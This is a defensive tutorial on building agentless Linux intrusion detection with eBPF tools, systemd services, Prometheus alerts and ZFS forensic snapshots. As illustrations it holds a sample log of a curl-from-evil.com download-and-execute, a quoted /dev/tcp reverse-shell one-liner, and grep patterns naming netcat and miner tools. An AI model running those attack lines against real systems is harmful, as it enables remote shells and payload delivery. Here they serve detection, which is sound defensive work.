eBPF for Security — Intrusion Detection Without Agents
Agent-based endpoint detection (EDR) means installing a vendor daemon that hoovers up RAM, phones home to a cloud, and breaks on every kernel update. eBPF gives you the same visibility — process execution, file integrity, network connections — directly from the kernel, with zero agents and zero dependencies. The kernel is the sensor.
The premise: every security-relevant event on a Linux box passes through the kernel. Processes call execve. Files get opened. Sockets get connected. eBPF lets you tap those events at the source — before any userspace tool can hide them. No agent to kill. No log to truncate. The kernel sees everything.
Why this beats agent-based EDR
Traditional EDR agents run in userspace. A rootkit with root access can kill the agent, hide its processes from ps, and delete its logs. eBPF programs run inside the kernel — they see the raw syscalls before userspace even knows they happened. An attacker would need to compromise the kernel itself (not just root) to evade eBPF tracing.
execsnoop — process execution monitor
Every time a process calls execve — launching a binary — execsnoop logs it. This catches reverse shells, crypto miners, privilege escalation tools, and any unauthorized binary the moment it runs.
# Watch every process launch system-wide, with timestamps
execsnoop -T
Output:
TIME PCOMM PID PPID RET ARGS
14:23:01 bash 4521 4519 0 /bin/bash -i
14:23:01 curl 4522 4521 0 /usr/bin/curl http://evil.com/shell.sh
14:23:02 bash 4523 4521 0 /bin/bash /tmp/shell.sh
That three-line sequence — bash spawning curl to fetch a script, then executing it — is a textbook reverse shell download-and-execute. execsnoop caught every step.
Detect specific threats
# Log only processes launched from /tmp or /dev/shm (common attack staging dirs)
execsnoop -T 2>&1 | grep -E '/tmp/|/dev/shm/'
# Catch crypto miners by watching for common miner binary names
execsnoop -T 2>&1 | grep -iE 'xmrig|minerd|cpuminer|stratum'
# Watch for reverse shell patterns
execsnoop -T 2>&1 | grep -E 'bash -i|nc -e|ncat -e|python.*socket|perl.*socket'
What you're catching
Crypto miners: almost always land in /tmp, get executed by a web shell or cron job, and call themselves something like kworker or kthreadd to blend in. execsnoop sees the real binary path.
Reverse shells: bash -i >& /dev/tcp/ATTACKER/PORT 0>&1 is the classic. It still calls execve for bash. execsnoop logs it.
Lateral movement: SSH from a compromised host spawns sshd then a shell. execsnoop logs the full chain with parent PIDs.
opensnoop — file integrity monitoring
opensnoop traces every open() and openat() syscall. Point it at your sensitive files and you have real-time file integrity monitoring — no AIDE database, no inotify limits, no polling interval.
# Watch accesses to critical auth files
opensnoop -T -f /etc/passwd
opensnoop -T -f /etc/shadow
opensnoop -T -f /etc/ssh/sshd_config
Or trace everything at once with bpftrace:
bpftrace -e '
tracepoint:syscalls:sys_enter_openat
/str(args.filename) == "/etc/passwd" ||
str(args.filename) == "/etc/shadow" ||
str(args.filename) == "/etc/sudoers" ||
str(args.filename) == "/root/.ssh/authorized_keys"/
{
time("%H:%M:%S ");
printf("pid=%d comm=%s file=%s\n", pid, comm, str(args.filename));
}'
Output:
14:31:07 pid=8821 comm=vi file=/etc/shadow
14:31:12 pid=8830 comm=python3 file=/root/.ssh/authorized_keys
Someone editing /etc/shadow with vi might be legitimate. Python3 touching authorized_keys is almost certainly an attacker adding their SSH key. The combination of process name + file path + timestamp tells the story.
Watch for SSH key injection
# Trace any process writing to any authorized_keys file
bpftrace -e '
tracepoint:syscalls:sys_enter_openat
/str(args.filename) == "/root/.ssh/authorized_keys" ||
str(args.filename) == "/home/*/.ssh/authorized_keys"/
{
time("%H:%M:%S ");
printf("ALERT: %s (pid=%d) opened %s flags=%d\n",
comm, pid, str(args.filename), args.flags);
}'
tcpconnect + tcplife — network intrusion detection
Every outbound TCP connection passes through the kernel's tcp_v4_connect path. tcpconnect and tcplife give you a complete picture of who is talking to whom, for how long, and how much data moved.
# Watch all outbound TCP connections with the process that made them
tcpconnect -T
Output:
TIME PID COMM IP SADDR DADDR DPORT
14:45:01 3312 curl 4 10.0.0.5 185.143.223.1 443
14:45:03 3315 python3 4 10.0.0.5 45.33.32.156 4444
14:45:05 8821 sshd 4 10.0.0.5 10.0.0.12 22
Line two is the problem. Python3 connecting outbound to port 4444 is a classic C2 (command and control) callback. tcpconnect caught the process name, PID, and destination in real time.
Detect C2 callbacks and lateral movement
# Flag connections to non-standard ports (not 80, 443, 22, 53)
tcpconnect -T 2>&1 | awk '$NF !~ /^(80|443|22|53)$/ {print "SUSPICIOUS:", $0}'
# Watch for lateral movement (internal-to-internal SSH)
tcpconnect -T 2>&1 | awk '$NF == 22 && $6 ~ /^(10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.)/ {print "LATERAL:", $0}'
Session analysis with tcplife
# Show completed TCP sessions with duration and bytes transferred
tcplife -T
Output:
TIME PID COMM IP LADDR LPORT RADDR RPORT TX_KB RX_KB MS
14:50:01 3315 python3 4 10.0.0.5 49221 45.33.32.156 4444 0 847 30042
A 30-second connection to port 4444 that received 847 KB of data. That is a C2 session downloading a payload. tcplife gives you duration, bytes, and process — everything you need to write the incident report.
Network detection without packet capture
Traditional network IDS (Snort, Suricata) inspects packets, which means decrypting TLS or missing encrypted traffic entirely. eBPF works at the socket layer — it sees the process making the connection, the destination, and the byte counts regardless of encryption. You cannot encrypt away from the kernel.
Building persistent eBPF monitors with systemd
One-off tracing is useful for investigation. Persistent monitoring catches threats while you sleep. Wrap any eBPF tool in a systemd service and it runs continuously.
cat > /etc/systemd/system/ebpf-execmonitor.service << 'EOF'
[Unit]
Description=eBPF process execution monitor
After=network.target
[Service]
Type=simple
ExecStart=/usr/sbin/execsnoop -T
StandardOutput=append:/var/log/ebpf-execsnoop.log
StandardError=append:/var/log/ebpf-execsnoop.err
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable --now ebpf-execmonitor
cat > /etc/systemd/system/ebpf-netmonitor.service << 'EOF'
[Unit]
Description=eBPF network connection monitor
After=network.target
[Service]
Type=simple
ExecStart=/usr/sbin/tcpconnect -T
StandardOutput=append:/var/log/ebpf-tcpconnect.log
StandardError=append:/var/log/ebpf-tcpconnect.err
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable --now ebpf-netmonitor
Now every process launch and every TCP connection is logged to files under /var/log/. These survive reboots and give you a forensic timeline.
Log rotation
cat > /etc/logrotate.d/ebpf-monitors << 'EOF'
/var/log/ebpf-*.log {
daily
rotate 30
compress
missingok
notifempty
copytruncate
}
EOF
Alerting: eBPF to syslog to Prometheus to your inbox
Logging is step one. Alerting is step two. Pipe eBPF output through syslog, expose metrics to Prometheus, and fire alerts through Alertmanager.
Step 1: Send eBPF output to syslog
# Modify the systemd service to pipe through logger
cat > /etc/systemd/system/ebpf-execalert.service << 'EOF'
[Unit]
Description=eBPF exec monitor with syslog alerting
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c '/usr/sbin/execsnoop -T | while IFS= read -r line; do echo "$line" | logger -t ebpf-exec -p local0.info; done'
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
Step 2: Write a Prometheus exporter (minimal)
cat > /usr/local/bin/ebpf-metrics.sh << 'SCRIPT'
#!/bin/bash
# Expose eBPF event counts as Prometheus metrics
# Run this on a cron every 60 seconds, write to node_exporter textfile dir
TEXTFILE_DIR="/var/lib/node_exporter/textfile_collector"
mkdir -p "$TEXTFILE_DIR"
EXEC_COUNT=$(wc -l < /var/log/ebpf-execsnoop.log 2>/dev/null || echo 0)
TCP_COUNT=$(wc -l < /var/log/ebpf-tcpconnect.log 2>/dev/null || echo 0)
SUSPICIOUS=$(grep -cE '/tmp/|/dev/shm/' /var/log/ebpf-execsnoop.log 2>/dev/null || echo 0)
cat > "$TEXTFILE_DIR/ebpf.prom" << EOF
# HELP ebpf_exec_total Total process executions observed
# TYPE ebpf_exec_total counter
ebpf_exec_total $EXEC_COUNT
# HELP ebpf_tcp_connections_total Total TCP connections observed
# TYPE ebpf_tcp_connections_total counter
ebpf_tcp_connections_total $TCP_COUNT
# HELP ebpf_suspicious_exec_total Processes launched from suspicious paths
# TYPE ebpf_suspicious_exec_total counter
ebpf_suspicious_exec_total $SUSPICIOUS
EOF
SCRIPT
chmod +x /usr/local/bin/ebpf-metrics.sh
Step 3: Alertmanager rule
# In your Prometheus alerting rules:
cat > /etc/prometheus/rules/ebpf-alerts.yml << 'EOF'
groups:
- name: ebpf_security
rules:
- alert: SuspiciousProcessExecution
expr: rate(ebpf_suspicious_exec_total[5m]) > 0
for: 1m
labels:
severity: critical
annotations:
summary: "Process launched from /tmp or /dev/shm"
description: "eBPF detected {{ $value }} suspicious executions in the last 5 minutes"
- alert: UnusualOutboundConnections
expr: rate(ebpf_tcp_connections_total[5m]) > 100
for: 5m
labels:
severity: warning
annotations:
summary: "Unusual outbound connection rate"
description: "{{ $value }} TCP connections/sec observed"
EOF
The full pipeline
eBPF (kernel) catches the event. Systemd keeps the monitor running. Syslog provides centralized logging. Prometheus scrapes the metrics. Alertmanager fires the notification. You get an email or Slack message. The entire chain is open source, runs on your hardware, and no data leaves your network.
bpftrace one-liners for security
Trace setuid calls (privilege escalation)
bpftrace -e '
tracepoint:syscalls:sys_enter_setuid {
time("%H:%M:%S ");
printf("setuid(%d) by %s (pid=%d)\n", args.uid, comm, pid);
}'
Watch for new SUID binaries appearing
bpftrace -e '
tracepoint:syscalls:sys_enter_chmod
/args.mode & 04000/
{
time("%H:%M:%S ");
printf("SUID SET: %s set mode %o on %s (pid=%d)\n",
comm, args.mode, str(args.filename), pid);
}
tracepoint:syscalls:sys_enter_fchmod
/args.mode & 04000/
{
time("%H:%M:%S ");
printf("SUID SET: %s set mode %o via fchmod (pid=%d)\n",
comm, args.mode, pid);
}'
If anything sets the SUID bit on a binary, this fires immediately. Attackers use SUID binaries for persistence — a SUID root shell in /tmp survives even if their initial access is killed.
Detect container escapes (namespace changes)
bpftrace -e '
tracepoint:syscalls:sys_enter_setns {
time("%H:%M:%S ");
printf("NAMESPACE CHANGE: %s (pid=%d) setns fd=%d nstype=%d\n",
comm, pid, args.fd, args.nstype);
}
tracepoint:syscalls:sys_enter_unshare {
time("%H:%M:%S ");
printf("UNSHARE: %s (pid=%d) flags=%d\n",
comm, pid, args.unshare_flags);
}'
Container escapes typically involve calling setns() to join the host's namespaces or unshare() to create new ones. This catches both patterns. Legitimate container runtimes (runc, containerd) also trigger this — so baseline your normal activity first, then alert on anomalies.
Trace all kernel module loads
bpftrace -e '
kprobe:do_init_module {
time("%H:%M:%S ");
printf("MODULE LOADED by %s (pid=%d uid=%d)\n", comm, pid, uid);
}'
Rootkits load kernel modules. On a stable production system, module loads should be rare and expected. Any surprise module load after boot is worth investigating.
Real example: log every process that opens a network socket
This bpftrace script creates a comprehensive log of every process that creates a network socket, including the socket type and protocol family.
#!/usr/bin/env bpftrace
/*
* socketwatch.bt - Log every network socket creation
* Run: bpftrace socketwatch.bt
*/
tracepoint:syscalls:sys_enter_socket
{
$family = args.family;
$type = args.type & 0xf; /* mask out SOCK_NONBLOCK/SOCK_CLOEXEC flags */
/* Only care about network sockets: AF_INET=2, AF_INET6=10 */
if ($family == 2 || $family == 10) {
time("%H:%M:%S ");
printf("pid=%-6d comm=%-16s family=%-5s type=%-7s\n",
pid, comm,
$family == 2 ? "IPv4" : "IPv6",
$type == 1 ? "STREAM" :
$type == 2 ? "DGRAM" :
$type == 3 ? "RAW" : "OTHER");
}
}
Output:
14:55:01 pid=3312 comm=curl family=IPv4 type=STREAM
14:55:02 pid=8821 comm=sshd family=IPv4 type=STREAM
14:55:03 pid=3315 comm=python3 family=IPv4 type=STREAM
14:55:05 pid=9901 comm=nmap family=IPv4 type=RAW
That last line — nmap opening a RAW socket — is a clear indicator of port scanning. On a production server, RAW sockets outside of a known monitoring tool are always suspicious.
Real example: watch for new SUID binaries
This script continuously monitors the filesystem for any chmod/fchmodat calls that set the SUID or SGID bit. Save it as a persistent service for ongoing protection.
#!/usr/bin/env bpftrace
/*
* suidwatch.bt - Alert on any SUID/SGID bit being set
* Run: bpftrace suidwatch.bt | logger -t suid-watch -p auth.alert
*/
tracepoint:syscalls:sys_enter_fchmodat
/args.mode & 06000/
{
time("%H:%M:%S ");
printf("ALERT SUID/SGID SET: comm=%s pid=%d uid=%d mode=%o file=%s\n",
comm, pid, uid, args.mode, str(args.filename));
}
tracepoint:syscalls:sys_enter_chmod
/args.mode & 04000/
{
time("%H:%M:%S ");
printf("ALERT SUID SET: comm=%s pid=%d uid=%d mode=%o file=%s\n",
comm, pid, uid, args.mode, str(args.filename));
}
Deploy it as a systemd service:
cat > /etc/systemd/system/suid-watch.service << 'EOF'
[Unit]
Description=eBPF SUID binary monitor
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'bpftrace /usr/local/share/bpftrace/suidwatch.bt | logger -t suid-watch -p auth.alert'
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable --now suid-watch
Forensic snapshots: ksnap when eBPF detects anomaly
On kldload systems with ZFS, you can automatically take a snapshot when eBPF detects something suspicious. This preserves the exact state of the filesystem at the moment of the incident — before the attacker can clean up.
cat > /usr/local/bin/ebpf-forensic-snap.sh << 'SCRIPT'
#!/bin/bash
# Called by eBPF alerting pipeline when suspicious activity is detected
# Usage: ebpf-forensic-snap.sh "reason string"
REASON="${1:-unknown}"
TIMESTAMP=$(date +%Y%m%d-%H%M%S)
POOL=$(zpool list -H -o name | head -1)
if [ -n "$POOL" ]; then
SNAPNAME="${POOL}@forensic-${TIMESTAMP}"
zfs snapshot -r "$SNAPNAME"
logger -t ebpf-forensic -p auth.crit \
"Forensic snapshot created: $SNAPNAME reason: $REASON"
echo "Snapshot: $SNAPNAME"
fi
SCRIPT
chmod +x /usr/local/bin/ebpf-forensic-snap.sh
Wire it into your exec monitor:
# Modified execsnoop pipeline that triggers forensic snapshots
cat > /usr/local/bin/ebpf-exec-alert.sh << 'SCRIPT'
#!/bin/bash
execsnoop -T | while IFS= read -r line; do
echo "$line" >> /var/log/ebpf-execsnoop.log
# Check for suspicious patterns
if echo "$line" | grep -qE '/tmp/|/dev/shm/|bash -i|nc -e|ncat'; then
echo "ALERT: $line" | logger -t ebpf-exec -p auth.alert
/usr/local/bin/ebpf-forensic-snap.sh "suspicious exec: $line"
fi
done
SCRIPT
chmod +x /usr/local/bin/ebpf-exec-alert.sh
ZFS + eBPF = forensic gold
ZFS snapshots are instant, atomic, and consume zero space until data changes. When eBPF detects an anomaly, snapshotting the entire pool takes milliseconds. Now you have a forensic copy of every file, every log, every binary — exactly as it existed at the moment of detection. The attacker can wipe logs and delete their tools, but the snapshot preserves the evidence.
This replaces agent-based EDR
Here is what you get with eBPF vs. a commercial EDR agent:
| Capability | Commercial EDR | eBPF on kldload |
|---|---|---|
| Process execution monitoring | Yes (agent) | Yes (execsnoop) |
| File integrity monitoring | Yes (agent) | Yes (opensnoop + bpftrace) |
| Network connection tracking | Yes (agent) | Yes (tcpconnect + tcplife) |
| Privilege escalation detection | Yes (agent) | Yes (setuid/setns tracing) |
| Forensic snapshots | No | Yes (ZFS snapshots) |
| Works offline | Partially | Fully |
| Data leaves your network | Yes (cloud telemetry) | No |
| Kernel module required | Often yes | No (in-kernel VM) |
| RAM overhead | 200-500 MB | ~2 MB per probe |
| Survives agent kill | No | Yes (kernel-level) |
| Annual cost | Per-endpoint licensing | Free (native kernel tools) |
You are not giving up anything by dropping the agent. You are gaining visibility, losing overhead, and keeping your data on your hardware.